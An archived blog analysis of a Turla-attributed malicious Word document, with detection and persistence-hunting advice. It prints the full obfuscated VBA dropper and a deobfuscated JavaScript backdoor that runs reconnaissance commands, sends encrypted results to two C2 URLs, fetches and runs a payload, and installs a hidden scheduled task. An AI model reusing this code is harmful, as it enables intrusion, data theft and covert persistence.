{
	"id": "718cd1eb-4be4-4932-8b6d-9097f774a37f",
	"created_at": "2026-04-06T00:14:23.589994Z",
	"updated_at": "2026-04-10T03:33:35.887264Z",
	"deleted_at": null,
	"sha1_hash": "074b04779bd356b303c6cc77c1afc7853c582e59",
	"title": "Analysis of a malicious DOC used by Turla APT group; hunting persistence via PowerShell",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1205211,
	"plain_text": "Analysis of a malicious DOC used by Turla APT group; hunting persistence via PowerShell\r\nArchived: 2026-04-05 13:20:05 UTC\r\nYesterday, John Lambert (@JohnLaTwC), from the Microsoft Threat Intelligence Center, tweeted about a malicious document used by the Turla APT group. The malicious document had been in VT for a few hours before his tweet.\r\nOn a daily basis I have to deal with malicious documents delivered by phishing emails, so I was interested in understanding how this malicious document works, whether a new exploit was used, or any new technique. This analysis allows me to create detection use cases.\r\nThe doc file mimics the agenda for an event sent from an embassy.\r\nOnce the macro has been executed, I can see that the process WINWORD.EXE spawns a WScript.exe command.\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 1 of 20\n\nA use case which monitors any WScript.exe process spawned by Office would detect this behaviour. The same would apply for PowerShell or cmd.exe.\r\nThis generic use case would detect a lot of common malware which uses Office documents as the infection vector.\r\nAfter some minutes, the script executes several other commands, for example 'net use', 'net share', 'tasklist', 'ipconfig', 'netstat', etc., to map the system and the network.\r\nThis is also a valid use case to implement. Obviously, this will need some fine tuning depending on the environment, but as a starting point it can permit the detection of suspicious behaviour.\r\nAt a later stage the same script performs some internet connections. Here again, monitoring any interpreter like wscript.exe, cmd.exe or powershell.exe making connections to the Internet can provide a lot of meaningful information. 
(This is already discussed here: http://blog.angelalonso.es/2017/08/malspam-campaign-exploiting-cve-2017.html)\r\nSo this malicious file would be detected with generic use cases which properly monitor certain processes and connections.\r\nNow, let's take a look at the code to see if I find something interesting.\r\nThe VBA macro is obfuscated:\r\nPublic OBKHLrC3vEDjVL As String\r\nPublic B8qen2T433Ds1bW As String\r\nFunction Q7JOhn5pIl648L6V43V(EjqtNRKMRiVtiQbSblq67() As Byte, M5wI32R3VF2g5B21EK4d As Long) As Boolea\r\nDim THQNfU76nlSbtJ5nX8LY6 As Byte\r\nTHQNfU76nlSbtJ5nX8LY6 = 45\r\nFor i = 0 To M5wI32R3VF2g5B21EK4d - 1\r\nEjqtNRKMRiVtiQbSblq67(i) = EjqtNRKMRiVtiQbSblq67(i) Xor THQNfU76nlSbtJ5nX8LY6\r\nTHQNfU76nlSbtJ5nX8LY6 = ((THQNfU76nlSbtJ5nX8LY6 Xor 99) Xor (i Mod 254))\r\nNext i\r\nQ7JOhn5pIl648L6V43V = True\r\nEnd Function\r\nSub AutoClose()\r\nOn Error Resume Next\r\nKill OBKHLrC3vEDjVL\r\nOn Error Resume Next\r\nSet R7Ks7ug4hRR2weOy7 = CreateObject(\"Scripting.FileSystemObject\")\r\nR7Ks7ug4hRR2weOy7.DeleteFile B8qen2T433Ds1bW \u0026 \"\\*.*\", True\r\nSet R7Ks7ug4hRR2weOy7 = Nothing\r\nEnd Sub\r\nSub AutoOpen()\r\nOn Error GoTo MnOWqnnpKXfRO\r\nDim NEnrKxf8l511\r\nDim N18Eoi6OG6T2rNoVl41W As Long\r\nDim M5wI32R3VF2g5B21EK4d As Long\r\nN18Eoi6OG6T2rNoVl41W = FileLen(ActiveDocument.FullName)\r\nNEnrKxf8l511 = FreeFile\r\nOpen (ActiveDocument.FullName) For Binary As #NEnrKxf8l511\r\nDim E2kvpmR17SI() As Byte\r\nReDim E2kvpmR17SI(N18Eoi6OG6T2rNoVl41W)\r\nGet #NEnrKxf8l511, 1, E2kvpmR17SI\r\nDim KqG31PcgwTc2oL47hjd7Oi As String\r\nKqG31PcgwTc2oL47hjd7Oi = StrConv(E2kvpmR17SI, vbUnicode)\r\nDim N34rtRBIU3yJO2cmMVu, I4j833DS5SFd34L3gwYQD\r\nDim VUy5oj112fLw51h6S\r\nSet VUy5oj112fLw51h6S = CreateObject(\"vbscript.regexp\")\r\nVUy5oj112fLw51h6S.Pattern = \"MxOH8pcrlepD3SRfF5ffVTy86Xe41L2qLnqTd5d5R7Iq87mWGES55fswgG84hIRdX74dlb1S\r\nSet I4j833DS5SFd34L3gwYQD = 
VUy5oj112fLw51h6S.Execute(KqG31PcgwTc2oL47hjd7Oi)\r\nDim Y5t4Ul7o385qK4YDhr\r\nIf I4j833DS5SFd34L3gwYQD.Count = 0 Then\r\nGoTo MnOWqnnpKXfRO\r\nEnd If\r\nFor Each N34rtRBIU3yJO2cmMVu In I4j833DS5SFd34L3gwYQD\r\nY5t4Ul7o385qK4YDhr = N34rtRBIU3yJO2cmMVu.FirstIndex\r\nExit For\r\nNext\r\nDim Wk4o3X7x1134j() As Byte\r\nDim KDXl18qY4rcT As Long\r\nKDXl18qY4rcT = 16827\r\nReDim Wk4o3X7x1134j(KDXl18qY4rcT)\r\nGet #NEnrKxf8l511, Y5t4Ul7o385qK4YDhr + 81, Wk4o3X7x1134j\r\nIf Not Q7JOhn5pIl648L6V43V(Wk4o3X7x1134j(), KDXl18qY4rcT + 1) Then\r\nGoTo MnOWqnnpKXfRO\r\nEnd If\r\nB8qen2T433Ds1bW = Environ(\"appdata\") \u0026 \"\\Microsoft\\Windows\"\r\nSet R7Ks7ug4hRR2weOy7 = CreateObject(\"Scripting.FileSystemObject\")\r\nIf Not R7Ks7ug4hRR2weOy7.FolderExists(B8qen2T433Ds1bW) Then\r\nB8qen2T433Ds1bW = Environ(\"appdata\")\r\nEnd If\r\nSet R7Ks7ug4hRR2weOy7 = Nothing\r\nDim K764B5Ph46Vh\r\nK764B5Ph46Vh = FreeFile\r\nOBKHLrC3vEDjVL = B8qen2T433Ds1bW \u0026 \"\\\" \u0026 \"maintools.js\"\r\nOpen (OBKHLrC3vEDjVL) For Binary As #K764B5Ph46Vh\r\nPut #K764B5Ph46Vh, 1, Wk4o3X7x1134j\r\nClose #K764B5Ph46Vh\r\nErase Wk4o3X7x1134j\r\nSet R66BpJMgxXBo2h = CreateObject(\"WScript.Shell\")\r\nR66BpJMgxXBo2h.Run \"\"\"\" + OBKHLrC3vEDjVL + \"\"\"\" + \" EzZETcSXyKAdF_e5I2i1\"\r\nActiveDocument.Save\r\nExit Sub\r\nMnOWqnnpKXfRO:\r\nClose #K764B5Ph46Vh\r\nActiveDocument.Save\r\nEnd Sub\r\nThis code basically creates a JS file C:\\Users\\user1\\AppData\\Roaming\\Microsoft\\Windows\\maintools.js and then executes it. 
However, for the execution to succeed it is necessary to pass the string \" EzZETcSXyKAdF_e5I2i1\" as a parameter.\r\nMoving forward and looking at the JS file C:\\Users\\user1\\AppData\\Roaming\\Microsoft\\Windows\\maintools.js, I see it is obfuscated:\r\ntry{var wvy1 = WScript.Arguments;var ssWZ = wvy1(0);var ES3c = y3zb();ES3c = LXv5(ES3c);ES3c = CpPT(s\r\neval(ES3c);\r\n}catch (e)\r\n{WScript.Quit();}function MTvK(CgqD){var XwH7 = CgqD.charCodeAt(0);if (XwH7 === 0x2B || XwH7 === 0x2D\r\nif (XwH7 === 0x2F || XwH7 === 0x5F) return 63\r\nif (XwH7 \u003c 0x30) return -1\r\nif (XwH7 \u003c 0x30 + 10) return XwH7 - 0x30 + 26 + 26\r\nif (XwH7 \u003c 0x41 + 26) return XwH7 - 0x41\r\nif (XwH7 \u003c 0x61 + 26) return XwH7 - 0x61 + 26\r\n}function LXv5(d27x){var LUK7 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";va\r\nreturn;var CHlB = d27x.length;var V8eR = d27x.charAt(CHlB - 2) === '=' ? 2 : d27x.charAt(CHlB - 1) ==\r\nvar mjqo = new Array(d27x.length * 3 / 4 - V8eR);var z8Ht = V8eR \u003e 0 ? 
d27x.length - 4 : d27x.length\r\nXGH6((n6T8 \u0026 0xFF00) \u003e\u003e 8)\r\nXGH6(n6T8 \u0026 0xFF)\r\n}if (V8eR === 2){n6T8 = (MTvK(d27x.charAt(i)) \u003c\u003c 2) | (MTvK(d27x.charAt(i + 1)) \u003e\u003e 4)\r\nXGH6(n6T8 \u0026 0xFF)\r\n}else if (V8eR === 1){n6T8 = (MTvK(d27x.charAt(i)) \u003c\u003c 10) | (MTvK(d27x.charAt(i + 1)) \u003c\u003c 4) | (MTvK(d\r\nXGH6((n6T8 \u003e\u003e 8) \u0026 0xFF)\r\nXGH6(n6T8 \u0026 0xFF)\r\n}return mjqo\r\n}function CpPT(bOe3,F5vZ)\r\n{var AWy7 = [];var V2Vl = 0;var qyCq;var mjqo = '';for (var i = 0; i \u003c 256; i++)\r\n{AWy7[i] = i;}for (var i = 0; i \u003c 256; i++)\r\n{V2Vl = (V2Vl + AWy7[i] + bOe3.charCodeAt(i % bOe3.length)) % 256;qyCq = AWy7[i];AWy7[i] = AWy7[V2Vl\r\n{i = (i + 1) % 256;V2Vl = (V2Vl + AWy7[i]) % 256;qyCq = AWy7[i];AWy7[i] = AWy7[V2Vl];AWy7[V2Vl] = qyC\r\n{var qGxZ = \"zAubgpaJRj0tIneNNZL0wjPqnSRiIygEC/sEWEDJU8LoihPXjdbeiMqcs6AavcLCPXuFM9LJ7svWGgIJKnOOKpe5\r\nAn easy way to view the code a bit more cleanly is to print it before the eval(ES3c); with a WScript.Echo(ES3c).\r\nOnce done, I run the command with the proper string and obtain the code:\r\nfunction UspD(zDmy)\r\n{var m3mH = WScript.CreateObject(\"ADODB.Stream\")\r\nm3mH.Type = 2;\r\nm3mH.CharSet = '437';\r\nm3mH.Open();\r\nm3mH.LoadFromFile(zDmy);\r\nvar c0xi = m3mH.ReadText;\r\nm3mH.Close();\r\nreturn cz_b(c0xi);\r\n}\r\nvar CKpR = new Array (\"http://www.saipadiesel124.com/wp-content/plugins/imsanity/tmp.php\",\"http://www\r\nvar tpO8 = \"w3LxnRSbJcqf8HrU\";\r\nvar auME = new Array(\"systeminfo \u003e \",\"net view \u003e\u003e \",\"net view /domain \u003e\u003e \",\"tasklist /v \u003e\u003e \",\"gpresul\r\nvar QUjy = new ActiveXObject(\"Scripting.FileSystemObject\");\r\nvar LIxF = WScript.ScriptName;\r\nvar w5mY = \"\";\r\nvar ruGx = 
TfOh();\r\nfunction hLit(XngP,y1qa)\r\n{char_set = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";\r\nvar Rj3c = \"\";\r\nvar OKpB = \"\";\r\nfor (var i = 0;\r\n i \u003c XngP.length;\r\n ++i)\r\n{var B8wU = XngP.charCodeAt(i);\r\nvar LUxg = B8wU.toString(2);\r\nwhile (LUxg.length \u003c (y1qa ? 8 : 16))\r\nLUxg = \"0\" + LUxg;\r\nOKpB += LUxg;\r\nwhile (OKpB.length \u003e= 6)\r\n{var vjUu = OKpB.slice(0,6);\r\nOKpB = OKpB.slice(6);\r\nRj3c += this.char_set.charAt(parseInt(vjUu,2));\r\n}}if (OKpB)\r\n{while (OKpB.length \u003c 6) OKpB += \"0\";\r\nRj3c += this.char_set.charAt(parseInt(OKpB,2));\r\n}while (Rj3c.length % (y1qa ? 4 : 8) != 0)\r\nRj3c += \"=\";\r\nreturn Rj3c;\r\n}\r\nvar b92A = [];\r\nb92A['C7'] = '80';\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 8 of 20\n\nb92A['FC'] = '81';\r\nb92A['E9'] = '82';\r\nb92A['E2'] = '83';\r\nb92A['E4'] = '84';\r\nb92A['E0'] = '85';\r\nb92A['E5'] = '86';\r\nb92A['E7'] = '87';\r\nb92A['EA'] = '88';\r\nb92A['EB'] = '89';\r\nb92A['E8'] = '8A';\r\nb92A['EF'] = '8B';\r\nb92A['EE'] = '8C';\r\nb92A['EC'] = '8D';\r\nb92A['C4'] = '8E';\r\nb92A['C5'] = '8F';\r\nb92A['C9'] = '90';\r\nb92A['E6'] = '91';\r\nb92A['C6'] = '92';\r\nb92A['F4'] = '93';\r\nb92A['F6'] = '94';\r\nb92A['F2'] = '95';\r\nb92A['FB'] = '96';\r\nb92A['F9'] = '97';\r\nb92A['FF'] = '98';\r\nb92A['D6'] = '99';\r\nb92A['DC'] = '9A';\r\nb92A['A2'] = '9B';\r\nb92A['A3'] = '9C';\r\nb92A['A5'] = '9D';\r\nb92A['20A7'] = '9E';\r\nb92A['192'] = '9F';\r\nb92A['E1'] = 'A0';\r\nb92A['ED'] = 'A1';\r\nb92A['F3'] = 'A2';\r\nb92A['FA'] = 'A3';\r\nb92A['F1'] = 'A4';\r\nb92A['D1'] = 'A5';\r\nb92A['AA'] = 'A6';\r\nb92A['BA'] = 'A7';\r\nb92A['BF'] = 'A8';\r\nb92A['2310'] = 'A9';\r\nb92A['AC'] = 'AA';\r\nb92A['BD'] = 'AB';\r\nb92A['BC'] = 'AC';\r\nb92A['A1'] = 'AD';\r\nb92A['AB'] = 'AE';\r\nb92A['BB'] = 'AF';\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 9 of 
20\n\nb92A['2591'] = 'B0';\r\nb92A['2592'] = 'B1';\r\nb92A['2593'] = 'B2';\r\nb92A['2502'] = 'B3';\r\nb92A['2524'] = 'B4';\r\nb92A['2561'] = 'B5';\r\nb92A['2562'] = 'B6';\r\nb92A['2556'] = 'B7';\r\nb92A['2555'] = 'B8';\r\nb92A['2563'] = 'B9';\r\nb92A['2551'] = 'BA';\r\nb92A['2557'] = 'BB';\r\nb92A['255D'] = 'BC';\r\nb92A['255C'] = 'BD';\r\nb92A['255B'] = 'BE';\r\nb92A['2510'] = 'BF';\r\nb92A['2514'] = 'C0';\r\nb92A['2534'] = 'C1';\r\nb92A['252C'] = 'C2';\r\nb92A['251C'] = 'C3';\r\nb92A['2500'] = 'C4';\r\nb92A['253C'] = 'C5';\r\nb92A['255E'] = 'C6';\r\nb92A['255F'] = 'C7';\r\nb92A['255A'] = 'C8';\r\nb92A['2554'] = 'C9';\r\nb92A['2569'] = 'CA';\r\nb92A['2566'] = 'CB';\r\nb92A['2560'] = 'CC';\r\nb92A['2550'] = 'CD';\r\nb92A['256C'] = 'CE';\r\nb92A['2567'] = 'CF';\r\nb92A['2568'] = 'D0';\r\nb92A['2564'] = 'D1';\r\nb92A['2565'] = 'D2';\r\nb92A['2559'] = 'D3';\r\nb92A['2558'] = 'D4';\r\nb92A['2552'] = 'D5';\r\nb92A['2553'] = 'D6';\r\nb92A['256B'] = 'D7';\r\nb92A['256A'] = 'D8';\r\nb92A['2518'] = 'D9';\r\nb92A['250C'] = 'DA';\r\nb92A['2588'] = 'DB';\r\nb92A['2584'] = 'DC';\r\nb92A['258C'] = 'DD';\r\nb92A['2590'] = 'DE';\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 10 of 20\n\nb92A['2580'] = 'DF';\r\nb92A['3B1'] = 'E0';\r\nb92A['DF'] = 'E1';\r\nb92A['393'] = 'E2';\r\nb92A['3C0'] = 'E3';\r\nb92A['3A3'] = 'E4';\r\nb92A['3C3'] = 'E5';\r\nb92A['B5'] = 'E6';\r\nb92A['3C4'] = 'E7';\r\nb92A['3A6'] = 'E8';\r\nb92A['398'] = 'E9';\r\nb92A['3A9'] = 'EA';\r\nb92A['3B4'] = 'EB';\r\nb92A['221E'] = 'EC';\r\nb92A['3C6'] = 'ED';\r\nb92A['3B5'] = 'EE';\r\nb92A['2229'] = 'EF';\r\nb92A['2261'] = 'F0';\r\nb92A['B1'] = 'F1';\r\nb92A['2265'] = 'F2';\r\nb92A['2264'] = 'F3';\r\nb92A['2320'] = 'F4';\r\nb92A['2321'] = 'F5';\r\nb92A['F7'] = 'F6';\r\nb92A['2248'] = 'F7';\r\nb92A['B0'] = 'F8';\r\nb92A['2219'] = 'F9';\r\nb92A['B7'] = 'FA';\r\nb92A['221A'] = 'FB';\r\nb92A['207F'] = 'FC';\r\nb92A['B2'] = 'FD';\r\nb92A['25A0'] = 'FE';\r\nb92A['A0'] = 
'FF';\r\nfunction TfOh()\r\n{var ayuh = Math.ceil(Math.random()*10 + 25);\r\nvar name = String.fromCharCode(Math.ceil(Math.random()*24 + 65));\r\nvar dc9V = WScript.CreateObject(\"WScript.Network\");\r\nw5mY = dc9V.UserName;\r\nfor (var count = 0;\r\n count \u003cayuh ;\r\ncount++ )\r\n{switch (Math.ceil(Math.random()*3))\r\n {case 1:\r\nname = name + Math.ceil(Math.random()*8);\r\n break;\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 11 of 20\n\ncase 2:\r\n name = name + String.fromCharCode(Math.ceil(Math.random()*24 + 97));\r\n break;\r\n default:\r\n name = name + String.fromCharCode(Math.ceil(Math.random()*24 + 65));\r\n break;\r\n }}return name;\r\n}\r\nvar wyKN = Blgx(bIdG());\r\ntry\r\n{var WE86 = bIdG();\r\nrGcR();\r\njSm8();\r\n}catch(e)\r\n{WScript.Quit();\r\n}\r\nfunction jSm8()\r\n{var c9lr = Fv6b();\r\nwhile(true)\r\n{for (var i = 0;\r\n i \u003c CKpR.length;\r\n i++)\r\n{var Ysyo = CKpR[i];\r\nvar f3cb = XEWG(Ysyo,c9lr);\r\n \r\nswitch (f3cb)\r\n{case \"good\":\r\n break;\r\n case \"exit\": WScript.Quit();\r\n break;\r\n case \"work\": XBL3(Ysyo);\r\n break;\r\n case \"fail\": tbMu();\r\n \r\n break;\r\n default:\r\n break;\r\n}TfOh();\r\n}WScript.Sleep((Math.random()*300 + 3600) * 1000);\r\n}}function bIdG()\r\n{var spq3= this['\\u0041\\u0063\\u0074i\\u0076eX\\u004F\\u0062j\\u0065c\\u0074'];\r\nvar zBVv = new spq3('\\u0057\\u0053cr\\u0069\\u0070\\u0074\\u002E\\u0053he\\u006C\\u006C');\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 12 of 20\n\nreturn zBVv;\r\n}function XBL3(B_TG)\r\n{var YIme = wyKN + LIxF.substring(0,LIxF.length - 2) + \"pif\";\r\nvar Kpxo = new ActiveXObject(\"MSXML2.XMLHTTP\");\r\nKpxo.OPEN(\"post\",B_TG,false);\r\nKpxo.SETREQUESTHEADER(\"user-agent:\",\"Mozilla/5.0 (Windows NT 6.1;\r\n Win64;\r\n x64);\r\n \" + 
Sz8k());\r\nKpxo.SETREQUESTHEADER(\"content-type:\",\"application/octet-stream\");\r\nKpxo.SETREQUESTHEADER(\"content-length:\",\"4\");\r\nKpxo.SEND(\"work\");\r\nif (QUjy.FILEEXISTS(YIme))\r\n{QUjy.DELETEFILE(YIme);\r\n}if (Kpxo.STATUS == 200)\r\n{var m3mH = new ActiveXObject(\"ADODB.STREAM\");\r\nm3mH.TYPE = 1;\r\nm3mH.OPEN();\r\nm3mH.WRITE(Kpxo.responseBody);\r\nm3mH.Position = 0;\r\nm3mH.Type = 2;\r\nm3mH.CharSet = \"437\";\r\nvar c0xi = m3mH.ReadText(m3mH.Size);\r\nvar ptF0 = FXx9(\"2f532d6baec3d0ec7b1f98aed4774843\",cz_b(c0xi));\r\nNoRS(ptF0,YIme);\r\n m3mH.Close();\r\n}var ruGx = TfOh();\r\nc5ae(YIme,B_TG);\r\nWScript.Sleep(30000);\r\nQUjy.DELETEFILE(YIme);\r\n}function tbMu()\r\n{QUjy.DELETEFILE(WScript.SCRIPTFULLNAME);\r\neV_C(\"TaskManager\",\"Windows Task Manager\",w5mY,v_FileName,\"EzZETcSXyKAdF_e5I2i1\",wyKN,false);\r\nKhDn(\"TaskManager\");\r\nWScript.Quit();\r\n}function XEWG(uXHK,hm2j)\r\n{try\r\n{var Kpxo = new ActiveXObject(\"MSXML2.XMLHTTP\");\r\nKpxo.OPEN(\"post\",uXHK,false);\r\nKpxo.SETREQUESTHEADER(\"user-agent:\",\"Mozilla/5.0 (Windows NT 6.1;\r\n Win64;\r\n x64);\r\n \" + Sz8k());\r\nKpxo.SETREQUESTHEADER(\"content-type:\",\"application/octet-stream\");\r\nvar rRi3 = hLit(hm2j,true);\r\nKpxo.SETREQUESTHEADER(\"content-length:\",rRi3.length);\r\nKpxo.SEND(rRi3);\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 13 of 20\n\nreturn Kpxo.responseText;\r\n}catch(e)\r\n{return \"\";\r\n}}function Sz8k()\r\n{var n9mV =\"\";\r\nvar dc9V = WScript.CreateObject(\"WScript.Network\");\r\nvar rRi3 = tpO8 + dc9V.ComputerName + w5mY;\r\nfor (var i = 0;\r\n i \u003c 16;\r\n i++)\r\n{var YsXA = 0\r\nfor (var j = i;\r\n j \u003c rRi3.length - 1;\r\n j++)\r\n{YsXA = YsXA ^ rRi3.charCodeAt(j);\r\n}YsXA =(YsXA % 10);\r\nn9mV = n9mV + YsXA.toString(10);\r\n}n9mV = n9mV + tpO8;\r\nreturn n9mV;\r\n}function rGcR()\r\n{v_FileName = wyKN + LIxF.substring(0,LIxF.length - 2) + 
\"js\";\r\nQUjy.COPYFILE(WScript.ScriptFullName,wyKN + LIxF);\r\nvar HFp7 = (Math.random()*150 + 350) * 1000;\r\nWScript.Sleep(HFp7);\r\neV_C(\"TaskManager\",\"Windows Task Manager\",w5mY,v_FileName,\"EzZETcSXyKAdF_e5I2i1\",wyKN,true);\r\n}function Fv6b()\r\n{var m_Rr = wyKN + \"~dat.tmp\";\r\nfor (var i = 0;\r\n i \u003c auME.length;\r\n i++)\r\n{WE86.Run(\"cmd.exe /c \" + auME[i] + \"\\x22\" + m_Rr + \"\\x22\",0,true);\r\n \r\n}var nRVN = UspD(m_Rr);\r\nWScript.Sleep(1000);\r\nQUjy.DELETEFILE(m_Rr);\r\nreturn FXx9(\"2f532d6baec3d0ec7b1f98aed4774843\",nRVN);\r\n}function c5ae(YIme,B_TG)\r\n{try\r\n{if (QUjy.FILEEXISTS(YIme))\r\n{WE86.Run(\"\\x22\" + YIme + \"\\x22\" );\r\n}}catch(e)\r\n{var Kpxo = new ActiveXObject(\"MSXML2.XMLHTTP\");\r\nKpxo.OPEN(\"post\",B_TG,false);\r\nvar ePMy = \"error\";\r\n \r\nKpxo.SETREQUESTHEADER(\"user-agent:\",\"Mozilla/5.0 (Windows NT 6.1;\r\n Win64;\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 14 of 20\n\nx64);\r\n \" + Sz8k());\r\nKpxo.SETREQUESTHEADER(\"content-type:\",\"application/octet-stream\");\r\nKpxo.SETREQUESTHEADER(\"content-length:\",ePMy.length);\r\nKpxo.SEND(ePMy);\r\nreturn \"\";\r\n}}function RPbY(r_X5)\r\n{var w8rG=\"0123456789ABCDEF\";\r\nvar yjrw = w8rG.substr(r_X5 \u0026 15,1);\r\nwhile(r_X5\u003e15)\r\n{r_X5 \u003e\u003e\u003e= 4;\r\nyjrw = w8rG.substr(r_X5 \u0026 15,1) + yjrw;\r\n}return yjrw;\r\n}function NptO(jlEi)\r\n{return parseInt(jlEi,16);\r\n}function eV_C(Bjmr,RT6x,O7Ec,YBwP,T9Px,egNr,rmGH)\r\n{try\r\n{var BGfI = WScript.CreateObject(\"Schedule.Service\");\r\nBGfI.Connect();\r\nvar w2cQ = BGfI.GetFolder(\"WPD\");\r\nvar xSm3 = BGfI.NewTask(0);\r\nxSm3.Principal.UserId = O7Ec;\r\nxSm3.Principal.LogonType = 6;\r\nvar wK2F = xSm3.RegistrationInfo;\r\nwK2F.Description = RT6x;\r\nwK2F.Author = O7Ec;\r\nvar aYbx = xSm3.Settings;\r\naYbx.Enabled = true;\r\naYbx.StartWhenAvailable = true;\r\naYbx.Hidden = rmGH;\r\nvar oSP7 = \"2015-07-12T11:47:24\";\r\nvar svaG = 
\"2020-03-21T08:00:00\";\r\nvar LDoN = xSm3.Triggers;\r\nvar r9EC = LDoN.Create(9);\r\nr9EC.StartBoundary = oSP7;\r\nr9EC.EndBoundary = svaG;\r\nr9EC.Id = \"LogonTriggerId\";\r\nr9EC.UserId = O7Ec;\r\nr9EC.Enabled = true;\r\nvar gQu9 = xSm3.Actions.Create(0);\r\ngQu9.Path = YBwP;\r\ngQu9.Arguments = T9Px;\r\ngQu9.WorkingDirectory = egNr;\r\nw2cQ.RegisterTaskDefinition(Bjmr,xSm3,6,\"\",\"\",3);\r\nreturn true;\r\n}catch(Err)\r\n{return false;\r\nhttps://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html\r\nPage 15 of 20\n\n}}function KhDn(Bjmr)\r\n{try\r\n{var UGgw = false;\r\nvar BGfI = WScript.CreateObject(\"Schedule.Service\");\r\nBGfI.Connect()\r\nvar w2cQ = BGfI.GetFolder(\"WPD\");\r\nvar FLs6 = w2cQ.GetTasks(0);\r\nif (FLs6.count \u003e= 0)\r\n{var gk1H = new Enumerator(FLs6);\r\nfor (;\r\n !gk1H.atEnd();\r\n gk1H.moveNext())\r\n{if (gk1H.item().name == Bjmr)\r\n{w2cQ.DeleteTask(Bjmr,0);\r\nUGgw = true;\r\n}}}}catch(Err)\r\n{return false;\r\n}}function cz_b(S3Ws)\r\n{var n9mV = [];\r\nvar mvAu = S3Ws.length;\r\nfor (var i = 0;\r\n i \u003c mvAu;\r\n i++)\r\n{var wtVX = S3Ws.charCodeAt(i);\r\nif(wtVX \u003e= 128)\r\n{var h = b92A['' + RPbY(wtVX)];\r\nwtVX = NptO(h);\r\n}n9mV.push(wtVX);\r\n}return n9mV;\r\n}function NoRS(ExY2,igeK)\r\n{var m3mH = WScript.CreateObject(\"ADODB.Stream\");\r\nm3mH.type = 2;\r\nm3mH.Charset = \"iso-8859-1\";\r\nm3mH.Open();\r\nm3mH.WriteText(ExY2);\r\nm3mH.Flush();\r\nm3mH.Position = 0;\r\nm3mH.SaveToFile(igeK,2);\r\nm3mH.close();\r\n}function Blgx(gaWo)\r\n{wyKN = \"c:\\x5cUsers\\x5c\" + w5mY + \"\\x5cAppData\\x5cLocal\\x5cMicrosoft\\x5cWindows\\x5c\";\r\nif (! QUjy.FOLDEREXISTS(wyKN))\r\nwyKN = \"c:\\x5cUsers\\x5c\" + w5mY + \"\\x5cAppData\\x5cLocal\\x5cTemp\\x5c\";\r\nif (! 
QUjy.FOLDEREXISTS(wyKN))\r\nwyKN = \"c:\\x5cDocuments and Settings\\x5c\" + w5mY + \"\\x5cApplication Data\\x5cMicrosoft\\x5cWindows\\x5c\r\nreturn wyKN\r\n}function FXx9(Z_3F,VMd7)\r\n{var NNSX = [];\r\nvar JDro = 0;\r\nvar KagY;\r\nvar n9mV = '';\r\nfor (var i = 0;\r\n i \u003c 256;\r\n i++)\r\n{NNSX[i] = i;\r\n}for (var i = 0;\r\n i \u003c 256;\r\n i++)\r\n{JDro = (JDro + NNSX[i] + Z_3F.charCodeAt(i % Z_3F.length)) % 256;\r\nKagY = NNSX[i];\r\nNNSX[i] = NNSX[JDro];\r\nNNSX[JDro] = KagY;\r\n}var i = 0;\r\nvar JDro = 0;\r\nfor (var y = 0;\r\n y \u003c VMd7.length;\r\n y++)\r\n{i = (i + 1) % 256;\r\nJDro = (JDro + NNSX[i]) % 256;\r\nKagY = NNSX[i];\r\nNNSX[i] = NNSX[JDro];\r\nNNSX[JDro] = KagY;\r\nn9mV += String.fromCharCode(VMd7[y] ^ NNSX[(NNSX[i] + NNSX[JDro]) % 256]);\r\n}return n9mV;\r\n}\r\nIn the 'clean' code it is possible to see the URLs for the second stage payload, which at the time of this analysis did not work anymore:\r\n\"http://www.saipadiesel124.com/wp-content/plugins/imsanity/tmp.php\",\r\n\"http://www.folk-cantabria.com/wp-content/plugins/wp-statistics/includes/classes/gallery_create_page_field.php\r\nAdditionally, the list of commands to map the system is in the code:\r\nsysteminfo \u003e \",\"net view \u003e\u003e \",\"net view /domain \u003e\u003e \",\"tasklist /v \u003e\u003e \",\"gpresult /z \u003e\u003e \",\"netstat -nao \u003e\u003e \",\"ipconfig /all \u003e\u003e \",\"arp -a \u003e\u003e \",\"net share \u003e\u003e \",\"net use \u003e\u003e \",\"net user \u003e\u003e \",\"net user administrator \u003e\u003e \",\"net user /domain \u003e\u003e \",\"net user administrator /domain \u003e\u003e \",\"set  \u003e\u003e \",\"dir %systemdrive%\\x5cUsers\\x5c*.* \u003e\u003e \",\"dir %userprofile%\\x5cAppData\\x5cRoaming\\x5cMicrosoft\\x5cWindows\\x5cRecent\\x5c*.* \u003e\u003e \",\"dir %userprofile%\\x5cDesktop\\x5c*.* \u003e\u003e 
\",\"tasklist /fi \\x22modules eq wow64.dll\\x22  \u003e\u003e \",\"tasklist /fi \\x22modules ne wow64.dll\\x22 \u003e\u003e \",\"dir \\x22%programfiles(x86)%\\x22 \u003e\u003e \",\"dir \\x22%programfiles%\\x22 \u003e\u003e \",\"dir %appdata% \u003e\u003e\");\r\nBut the most interesting part is how the persistence is done: via the Schedule Service (a scheduled task).\r\nA scheduled task named \"TaskManager\" under a folder WPD is created.\r\nThis task executes when the user logs on and calls the JS code c:\\Users\\user1\\AppData\\Local\\Microsoft\\Windows\\maintools.js EzZETcSXyKAdF_e5I2i1.\r\nWith the Task Scheduler tool from Windows, it is possible to spot it.\r\nA way to check it via the command line is dumping all the scheduled tasks and exporting them to a file, for example with a command like this:\r\nschtasks /query /fo csv /v  \u003e output.csv\r\nThis permits seeing the full scheduled task:\r\n\"PC-DEV\",\"\\WPD\\TaskManager\",\"N/A\",\"Ready\",\"Interactive 